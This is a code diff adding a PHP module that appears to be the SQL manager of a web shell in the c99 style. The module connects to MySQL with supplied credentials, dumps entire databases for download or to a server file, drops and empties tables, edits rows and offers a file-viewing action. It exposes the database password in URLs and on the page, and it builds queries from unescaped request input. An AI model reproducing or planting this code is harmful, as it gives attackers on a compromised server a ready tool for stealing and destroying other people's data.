+ $sql_surl .= "&";
+ ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
+ if ($sql_server)
+ {
+  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
+  $err = mysql_smarterror();
+  @mysql_select_db($sql_db,$sql_sock);
+  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
+ }
+ else {$sql_sock = FALSE;}
+ echo "<b>SQL Manager:</b><br>";
+ if (!$sql_sock)
+ {
+  if (!$sql_server) {echo "NO CONNECTION";}
+  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
+ }
+ else
+ {
+  $sqlquicklaunch = array();
+  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
+  $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
+  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
+  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
+  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
+  $sqlquicklaunch[] = array("Logout",$surl."act=sql");
+  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}
+  echo "</center>";
+ }
+ echo "</td></tr><tr>";
+ if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
+ else
+ {
+  //Start left panel
+  if (!empty($sql_db))
+  {
+   ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_tables($sql_db);
+   if (!$result) {echo mysql_smarterror();}
+   else
+   {
+    echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
+    $c = 0;
+    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
+    if (!$c) {echo "No tables found in database.";}
+   }
+  }
+  else
+  {
+   ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_dbs($sql_sock);
+   if (!$result) {echo mysql_smarterror();}
+   else
+   {
+    ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
+    $c = 0;
+    $dbs = "";
+    while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
+    echo "<option value=\"\">Databases (".$c.")</option>";
+    echo $dbs;
+   }
+   ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
+  }
+  //End left panel
+  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
+  //Start center panel
+  $diplay = TRUE;
+  if ($sql_db)
+  {
+   if (!is_numeric($c)) {$c = 0;}
+   if ($c == 0) {$c = "no";}
+   echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
+   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
+   echo "</b></center>";
+   $acts = array("","dump");
+   if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
+   elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
+   elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
+   elseif ($sql_tbl_act == "insert")
+   {
+    if ($sql_tbl_insert_radio == 1)
+    {
+     $keys = "";
+     $akeys = array_keys($sql_tbl_insert);
+     foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
+     if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
+     $values = "";
+     $i = 0;
+     foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
+     if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
+     $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
+     $sql_act = "query";
+     $sql_tbl_act = "browse";
+    }
+    elseif ($sql_tbl_insert_radio == 2)
+    {
+     $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
+     $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
+     $result = mysql_query($sql_query) or print(mysql_smarterror());
+     $result = mysql_fetch_array($result, MYSQL_ASSOC);
+     $sql_act = "query";
+     $sql_tbl_act = "browse";
+    }
+   }
+   if ($sql_act == "query")
+   {
+    echo "<hr size=\"1\" noshade>";
+    if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+    if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";}
+   }
+   if (in_array($sql_act,$acts))
+   {
+    ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
+    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
+    if ($sql_act == "newtbl")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
+    }
+    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+   }
+   elseif ($sql_act == "dump")
+   {
+    if (empty($submit))
+    {
+     $diplay = FALSE;
+     echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
+     echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
+     $v = join (";",$dmptbls);
+     echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
+     if ($dump_file) {$tmp = $dump_file;}
+     else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
+     echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
+     echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
+     echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
+     echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
+     echo "</form>";
+    }
+    else
+    {
+     $diplay = TRUE;
+     $set = array();
+     $set["sock"] = $sql_sock;
+     $set["db"] = $sql_db;
+     $dump_out = "download";
+     $set["print"] = 0;
+     $set["nl2br"] = 0;
+     $set[""] = 0;
+     $set["file"] = $dump_file;
+     $set["add_drop"] = TRUE;
+     $set["onlytabs"] = array();
+     if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
+     $ret = mysql_dump($set);
+     if ($sql_dump_download)
+     {
+      @ob_clean();
+      header("Content-type: application/octet-stream");
+      header("Content-length: ".strlen($ret));
+      header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
+      echo $ret;
+      exit;
+     }
+     elseif ($sql_dump_savetofile)
+     {
+      $fp = fopen($sql_dump_file,"w");
+      if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
+      else
+      {
+       fwrite($fp,$ret);
+       fclose($fp);
+       echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
+      }
+     }
+     else {echo "<b>Dump: nothing to do!</b>";}
+    }
+   }
+   if ($diplay)
+   {
+    if (!empty($sql_tbl))
+    {
+     if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
+     $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
+     $count_row = mysql_fetch_array($count);
+     mysql_free_result($count);
+     $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
+     $tbl_struct_fields = array();
+     while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
+     if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
+     if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
+     if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
+     if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
+     $perpage = $sql_tbl_le - $sql_tbl_ls;
+     if (!is_numeric($perpage)) {$perpage = 10;}
+     $numpages = $count_row[0]/$perpage;
+     $e = explode(" ",$sql_order);
+     if (count($e) == 2)
+     {
+      if ($e[0] == "d") {$asc_desc = "DESC";}
+      else {$asc_desc = "ASC";}
+      $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
+     }
+     else {$v = "";}
+     $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
+     $result = mysql_query($query) or print(mysql_smarterror());
+     echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
+     if ($sql_tbl_act == "insert")
+     {
+      if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
+      if (!empty($sql_tbl_insert_radio))
+      {
+
+      }
+      else
+      {
+       echo "<br><br><b>Inserting row into table:</b><br>";
+       if (!empty($sql_tbl_insert_q))
+       {
+        $sql_query = "SELECT * FROM `".$sql_tbl."`";
+        $sql_query .= " WHERE".$sql_tbl_insert_q;
+        $sql_query .= " LIMIT 1;";
+        $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
+        $values = mysql_fetch_assoc($result);
+        mysql_free_result($result);
+       }
+       else {$values = array();}
+       echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
+       foreach ($tbl_struct_fields as $field)
+       {
+        $name = $field["Field"];
+        if (empty($sql_tbl_insert_q)) {$v = "";}
+        echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
+        $i++;
+       }
+       echo "</table><br>";
+       echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
+       if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
+       echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
+      }
+     }
+     if ($sql_tbl_act == "browse")
+     {
+      $sql_tbl_ls = abs($sql_tbl_ls);
+      $sql_tbl_le = abs($sql_tbl_le);
+      echo "<hr size=\"1\" noshade>";
+      echo "[Pages]&nbsp;";
+      $b = 0;
+      for($i=0;$i<$numpages;$i++)
+      {
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
+       echo $i;
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
+       if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
+       else {echo "&nbsp;";}
+      }
+      if ($i == 0) {echo "empty";}
+      echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>";
+      echo "<tr>";
+      echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
+      for ($i=0;$i<mysql_num_fields($result);$i++)
+      {
+       $v = mysql_field_name($result,$i);
+       if ($e[0] == "a") {$s = "d"; $m = "asc";}
+       else {$s = "a"; $m = "desc";}
+       echo "<td>";
+       if (empty($e[0])) {$e[0] = "a";}
+       if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
+       else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\">[sort]</a>";}
+       echo "</td>";
+      }
+      echo "<td><font color=\"green\"><b>Action</b></font></td>";
+      echo "</tr>";
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       echo "<tr>";
+       $w = "";
+       $i = 0;
+       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
+       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
+       echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
+       $i = 0;
+       foreach ($row as $k=>$v)
+       {
+        $v = htmlspecialchars($v);
+        if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
+        echo "<td>".$v."</td>";
+        $i++;
+       }
+       echo "<td>";
+       echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\">[Delete]</a>&nbsp;";
+       echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><b>[Edit]</b></a>&nbsp;";
+       echo "</td>";
+       echo "</tr>";
+      }
+      mysql_free_result($result);
+      echo "</table><hr size=\"1\" noshade><p align=\"left\">^<select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"deleterow\">Delete</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+     }
+    }
+    else
+    {
+     $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
+     if (!$result) {echo mysql_smarterror();}
+     else
+     {
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
+      $i = 0;
+      $tsize = $trows = 0;
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       $tsize += $row["Data_length"];
+       $trows += $row["Rows"];
+       $size = view_size($row["Data_length"]);
+       echo "<tr>";
+       echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
+       echo "<td>".$row["Rows"]."</td>";
+       echo "<td>".$row["Type"]."</td>";
+       echo "<td>".$row["Create_time"]."</td>";
+       echo "<td>".$row["Update_time"]."</td>";
+       echo "<td>".$size."</td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\">[Empty]</a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\">[Drop]</a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><b>[Insert]</b></a>&nbsp;</td>";
+       echo "</tr>";
+       $i++;
+      }
+      echo "<tr bgcolor=\"000000\">";
+      echo "<td><center><b>»</b></center></td>";
+      echo "<td><center><b>".$i." table(s)</b></center></td>";
+      echo "<td><b>".$trows."</b></td>";
+      echo "<td>".$row[1]."</td>";
+      echo "<td>".$row[10]."</td>";
+      echo "<td>".$row[11]."</td>";
+      echo "<td><b>".view_size($tsize)."</b></td>";
+      echo "<td></td>";
+      echo "</tr>";
+      echo "</table><hr size=\"1\" noshade><p align=\"right\">^<select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"tbldrop\">Drop</option>";
+      echo "<option value=\"tblempty\">Empty</option>";
+      echo "<option value=\"tbldump\">Dump</option>";
+      echo "<option value=\"tblcheck\">Check table</option>";
+      echo "<option value=\"tbloptimize\">Optimize table</option>";
+      echo "<option value=\"tblrepair\">Repair table</option>";
+      echo "<option value=\"tblanalyze\">Analyze table</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+      mysql_free_result($result);
+     }
+    }
+   }
+   }
+  }
+  else
+  {
+   $acts = array("","newdb","serverstatus","servervars","processes","getfile");
+   if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
+   if (!empty($sql_act))
+   {
+    echo "<hr size=\"1\" noshade>";
+    if ($sql_act == "newdb")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
